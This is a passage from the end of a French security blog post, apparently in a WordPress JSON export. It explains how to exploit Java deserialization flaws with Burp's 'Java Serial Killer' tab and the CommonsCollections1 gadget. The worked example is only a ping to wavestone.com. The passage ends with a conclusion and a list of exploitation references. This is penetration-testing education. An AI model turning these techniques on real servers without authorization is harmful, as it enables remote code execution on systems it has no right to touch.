style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15756 media-15756\" class=\"align-none\">\n<figure id=\"post-15764 media-15764\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15764 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-bis.png\" alt=\"\" width=\"640\" height=\"229\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-bis.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-bis-437x156.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I13-bis-71x25.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">Allez ensuite dans l\u2019onglet Burp \u00ab Java Serial Killer \u00bb :<\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15756 media-15756\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15756 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I14.png\" alt=\"\" width=\"640\" height=\"327\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I14.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I14-374x191.png 374w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I14-71x36.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">Cet onglet prend en entr\u00e9e :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li>Une commande \u00e0 ex\u00e9cuter sur le serveur cible<\/li>\n<li>La librairie vuln\u00e9rable \u00e0 exploiter<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Par exemple, pour envoyer une requ\u00eate ping \u00e0 <b>wavestone.com<\/b> en utilisant le type de charge utile <b>CommonsCollections1<\/b>, car nous savons qu\u2019elle fonctionne suite \u00e0 la phase de d\u00e9tection :<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">\n<figure id=\"post-15758 media-15758\" class=\"align-none\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-15758 size-full\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I15.png\" alt=\"\" width=\"640\" height=\"333\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I15.png 640w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I15-367x191.png 367w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I15-71x37.png 71w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<div class=\"separator\" style=\"clear: both; text-align: center;\"><\/div>\n<p>&nbsp;<\/p>\n<\/div>\n<div style=\"text-align: justify;\">\n<p>Il est aussi possible d\u2019encoder la charge en Base64, si c\u2019est le format attendu par le serveur (voir la petite checkbox \u00e0 droite de \u00ab Serialize \u00bb).<\/p>\n<\/div>\n<h2 style=\"text-align: justify;\">Conclusion<\/h2>\n<div style=\"text-align: justify;\">Vous avez d\u00e9sormais les bases th\u00e9oriques permettant de comprendre les vuln\u00e9rabilit\u00e9s li\u00e9es \u00e0 la d\u00e9s\u00e9rialisation en Java, et les techniques et outillages pratiques permettant de les exploiter dans les librairies les plus connues, sans connaissance pr\u00e9alable du code applicatif.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Toutefois, il est \u00e0 garder en t\u00eate que ces librairies ne sont pas utilis\u00e9es dans 100% des cas de d\u00e9s\u00e9rialisation, comme vu dans le chapitre \u00ab Exemple d\u2019attaque : Compromission de compte utilisateur \u00bb, o\u00f9 la vuln\u00e9rabilit\u00e9 exploit\u00e9e n\u2019impliquait d\u2019ailleurs m\u00eame pas l&#8217;envoi de code au serveur \u00e0 ex\u00e9cuter. Les exploits plus sp\u00e9cifiques reposent donc \u00e9norm\u00e9ment sur la connaissance du code (ou l\u2019ing\u00e9nierie inverse sur ce code) qui peut \u00eatre manipul\u00e9 par d\u00e9s\u00e9rialisation. D\u2019o\u00f9 beaucoup de difficult\u00e9s \u00e0 exploiter les vuln\u00e9rabilit\u00e9s de type d\u00e9s\u00e9rialisation malgr\u00e9 l\u2019impact parfois colossal de ce type de failles.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Par ailleurs, la s\u00e9rialisation\/d\u00e9s\u00e9rialisation n\u2019est pas un concept exclusif \u00e0 Java, et se retrouve dans de nombreux autres langages de programmation, notamment :<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><b>Python : <\/b>pickling \/ unpickling<\/li>\n<li><b>PHP : <\/b>serializing \/ deserializing<\/li>\n<li><b>Ruby : <\/b>marshalling \/ unmarshalling<\/li>\n<li>\u2026<\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">La m\u00e9thodologie globale reste la m\u00eame, mais les outils peuvent varier (<b>Freddy <\/b>\u00e0 la place de <b>ysoserial <\/b>pour les moteurs de d\u00e9s\u00e9rialisation XML par exemple\u2026).<\/div>\n<div style=\"text-align: justify;\">La cheatsheet suivante peut donner de bonnes pistes d\u2019audit pour ces autres langages et technologies :<\/div>\n<div style=\"text-align: justify;\"><a href=\"https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Deserialization_Cheat_Sheet.md\">https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Deserialization_Cheat_Sheet.md<\/a>.<\/div>\n<div><\/div>\n<h3 style=\"text-align: justify;\">Sources et r\u00e9f\u00e9rences pour approfondir le sujet<\/h3>\n<div style=\"text-align: justify;\">Article Nytro sur la d\u00e9s\u00e9rialisation Java<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/nytrosecurity.com\/2018\/05\/30\/understanding-java-deserialization\/\">https:\/\/nytrosecurity.com\/2018\/05\/30\/understanding-java-deserialization\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Article de Synopsys expliquant comment exfiltrer de la donn\u00e9e via la d\u00e9s\u00e9rialisation Java et contourner les principales limitations techniques que l\u2019on peut rencontrer<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/www.synopsys.com\/content\/dam\/synopsys\/sig-assets\/whitepapers\/exploiting-the-java-deserialization-vulnerability.pdf\">https:\/\/www.synopsys.com\/content\/dam\/synopsys\/sig-assets\/whitepapers\/exploiting-the-java-deserialization-vulnerability.pdf<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Cheatsheet pour la d\u00e9s\u00e9rialisation Java<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/github.com\/GrrrDog\/Java-Deserialization-Cheat-Sheet\">https:\/\/github.com\/GrrrDog\/Java-Deserialization-Cheat-Sheet<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">La d\u00e9s\u00e9rialisation Java avec Burp<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/blog.netspi.com\/java-deserialization-attacks-burp\/\">https:\/\/blog.netspi.com\/java-deserialization-attacks-burp\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Article complet expliquant la d\u00e9s\u00e9rialisation Java et listant plusieurs outils d\u00e9di\u00e9s<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/nickbloor.co.uk\/2017\/08\/13\/attacking-java-deserialization\/\">https:\/\/nickbloor.co.uk\/2017\/08\/13\/attacking-java-deserialization\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Liste de recommandations sur l\u2019usage de la d\u00e9s\u00e9rialisation pour divers langages<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Deserialization_Cheat_Sheet.md\">https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Deserialization_Cheat_Sheet.md<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Support d\u2019un talk d\u2019Insomnia sur la d\u00e9s\u00e9rialisation pour plusieurs langages \u00e0 l\u2019OWASP New Zealand Day 2016<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/insomniasec.com\/cdn-assets\/Deserialization_-__What_Could_Go_Wrong.pdf\">https:\/\/insomniasec.com\/cdn-assets\/Deserialization_-__What_Could_Go_Wrong.pdf<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Exploitation de vuln\u00e9rabilit\u00e9s de d\u00e9s\u00e9rialisation Java dans des environnements s\u00e9curis\u00e9s (syst\u00e8mes avec pare-feu, Java mis \u00e0 jour)<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/deadcode.me\/blog\/2016\/09\/02\/Blind-Java-Deserialization-Commons-Gadgets.html\">https:\/\/deadcode.me\/blog\/2016\/09\/02\/Blind-Java-Deserialization-Commons-Gadgets.html<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Exploiter la d\u00e9s\u00e9rialisation Java en aveugle avec Burp et Ysoserial<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/www.n00py.io\/2017\/11\/exploiting-blind-java-deserialization-with-burp-and-ysoserial\/\">https:\/\/www.n00py.io\/2017\/11\/exploiting-blind-java-deserialization-with-burp-and-ysoserial\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Write-up du challenge Webgoat 8 (application d\u2019entra\u00eenement d\u00e9velopp\u00e9e par l\u2019OWASP) d\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 de d\u00e9s\u00e9rialisation non s\u00e9curis\u00e9e<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/medium.com\/abn-amro-red-team\/java-deserialization-from-discovery-to-reverse-shell-on-limited-environments-2e7b4e14fbef\">https:\/\/medium.com\/abn-amro-red-team\/java-deserialization-from-discovery-to-reverse-shell-on-limited-environments-2e7b4e14fbef<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Article d\u2019un reverse engineer de Tenable expliquant l\u2019analyse de la\u00a0 CVE-2016-3737, et l\u2019\u00e9criture de gadgets pour Jython<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/fr.tenable.com\/blog\/expanding-on-a-known-vulnerability-attacking-with-jython\">https:\/\/fr.tenable.com\/blog\/expanding-on-a-known-vulnerability-attacking-with-jython<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Cours Java sur l\u2019impl\u00e9mentation d\u2019une classe s\u00e9rialisable<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"http:\/\/www.javapractices.com\/topic\/TopicAction.do?Id=45\">http:\/\/www.javapractices.com\/topic\/TopicAction.do?Id=45<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Support d\u2019un talk d\u2019Alvaro Munoz (@pwntester) et Christian Schneider (@cschneider4711) \u00e0 l\u2019OWASP AppSecEU 2016 sur les vuln\u00e9rabilit\u00e9s de d\u00e9s\u00e9rialisation de la JVM et comment s\u2019en prot\u00e9ger<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/fr.slideshare.net\/cschneider4711\/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016\">https:\/\/fr.slideshare.net\/cschneider4711\/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Support d\u2019un talk de Chris Frohoff (@frohoff) et Gabriel Lawrence (@gebl) \u00e0 l\u2019OWASP San Diego sur la d\u00e9s\u00e9rialisation Java<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/www.slideshare.net\/frohoff1\/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization\">https:\/\/www.slideshare.net\/frohoff1\/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Analyse de l\u2019attaque d\u2019Equifax (143 millions de clients touch\u00e9s aux USA) en 2017 par @brandur, reposant sur le cha\u00eenage de gadgets<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/brandur.org\/fragments\/gadgets-and-chains\">https:\/\/brandur.org\/fragments\/gadgets-and-chains<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Support d\u2019un talk de Matthias Kaiser (@matthias_kaiser) \u00e0 la HackPra WS 2015 sur l\u2019exploitation de vuln\u00e9rabilit\u00e9s de d\u00e9s\u00e9rialisation non-s\u00e9curis\u00e9e<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/fr.slideshare.net\/codewhitesec\/exploiting-deserialization-vulnerabilities-in-java-54707478\">https:\/\/fr.slideshare.net\/codewhitesec\/exploiting-deserialization-vulnerabilities-in-java-54707478<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Article de Ian Haken sur la d\u00e9couverte automatis\u00e9e de cha\u00eenes de gadgets, notamment avec Gadget Inspector<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/i.blackhat.com\/us-18\/Thu-August-9\/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains-wp.pdf\">https:\/\/i.blackhat.com\/us-18\/Thu-August-9\/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains-wp.pdf<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Article de @breenmachine de 2015 sur la d\u00e9s\u00e9rialisation Java dans plusieurs technologies du march\u00e9 et d\u00e9tail de 5 exploits (websphere, jboss, jenkins, weblogic et openNMS)<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/foxglovesecurity.com\/2015\/11\/06\/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\/\">https:\/\/foxglovesecurity.com\/2015\/11\/06\/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Introduction La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications. &nbsp; Exemple de s\u00e9rialisation d&#8217;une variable&#8230;<\/p>\n","protected":false},"author":1418,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"page-templates\/tmpl-one.php","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[36,3225],"tags":[3899,1069,3901,3900],"coauthors":[3902],"class_list":["post-15728","post","type-post","status-publish","format-standard","hentry","category-cybersecurity-digital-trust","category-ethical-hacking-indicent-response","tag-java","tag-outil","tag-rce","tag-serialisation"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight<\/title>\n<meta name=\"description\" content=\"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight\" \/>\n<meta property=\"og:description\" content=\"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\" \/>\n<meta property=\"og:site_name\" content=\"RiskInsight\" \/>\n<meta property=\"article:published_time\" content=\"2019-07-10T09:00:29+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-07T15:15:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\" \/>\n<meta name=\"author\" content=\"Bilal Benseddiq\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Bilal Benseddiq\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"21 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\"},\"author\":{\"name\":\"Bilal Benseddiq\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/66dda0a265d60d65e7a8a3e373ccd8b6\"},\"headline\":\"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java)\",\"datePublished\":\"2019-07-10T09:00:29+00:00\",\"dateModified\":\"2021-07-07T15:15:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\"},\"wordCount\":4280,\"publisher\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\",\"keywords\":[\"java\",\"outil\",\"RCE\",\"s\u00e9rialisation\"],\"articleSection\":[\"Cybersecurity &amp; Digital Trust\",\"Ethical Hacking &amp; Incident Response\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\",\"name\":\"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight\",\"isPartOf\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\",\"datePublished\":\"2019-07-10T09:00:29+00:00\",\"dateModified\":\"2021-07-07T15:15:02+00:00\",\"description\":\"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\",\"contentUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#website\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\",\"name\":\"RiskInsight\",\"description\":\"The cybersecurity &amp; digital trust blog by Wavestone&#039;s consultants\",\"publisher\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.riskinsight-wavestone.com\/en\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\",\"name\":\"Wavestone\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png\",\"contentUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png\",\"width\":50,\"height\":50,\"caption\":\"Wavestone\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/66dda0a265d60d65e7a8a3e373ccd8b6\",\"name\":\"Bilal Benseddiq\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/author\/bilal-benseddiq\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight","description":"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/","og_locale":"en_US","og_type":"article","og_title":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight","og_description":"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.","og_url":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/","og_site_name":"RiskInsight","article_published_time":"2019-07-10T09:00:29+00:00","article_modified_time":"2021-07-07T15:15:02+00:00","og_image":[{"url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png","type":"","width":"","height":""}],"author":"Bilal Benseddiq","twitter_misc":{"Written by":"Bilal Benseddiq","Est. reading time":"21 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#article","isPartOf":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/"},"author":{"name":"Bilal Benseddiq","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/66dda0a265d60d65e7a8a3e373ccd8b6"},"headline":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java)","datePublished":"2019-07-10T09:00:29+00:00","dateModified":"2021-07-07T15:15:02+00:00","mainEntityOfPage":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/"},"wordCount":4280,"publisher":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage"},"thumbnailUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png","keywords":["java","outil","RCE","s\u00e9rialisation"],"articleSection":["Cybersecurity &amp; Digital Trust","Ethical Hacking &amp; Incident Response"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/","url":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/","name":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight","isPartOf":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage"},"thumbnailUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png","datePublished":"2019-07-10T09:00:29+00:00","dateModified":"2021-07-07T15:15:02+00:00","description":"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.","breadcrumb":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage","url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png","contentUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.riskinsight-wavestone.com\/en\/"},{"@type":"ListItem","position":2,"name":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java)"}]},{"@type":"WebSite","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#website","url":"https:\/\/www.riskinsight-wavestone.com\/en\/","name":"RiskInsight","description":"The cybersecurity &amp; digital trust blog by Wavestone&#039;s 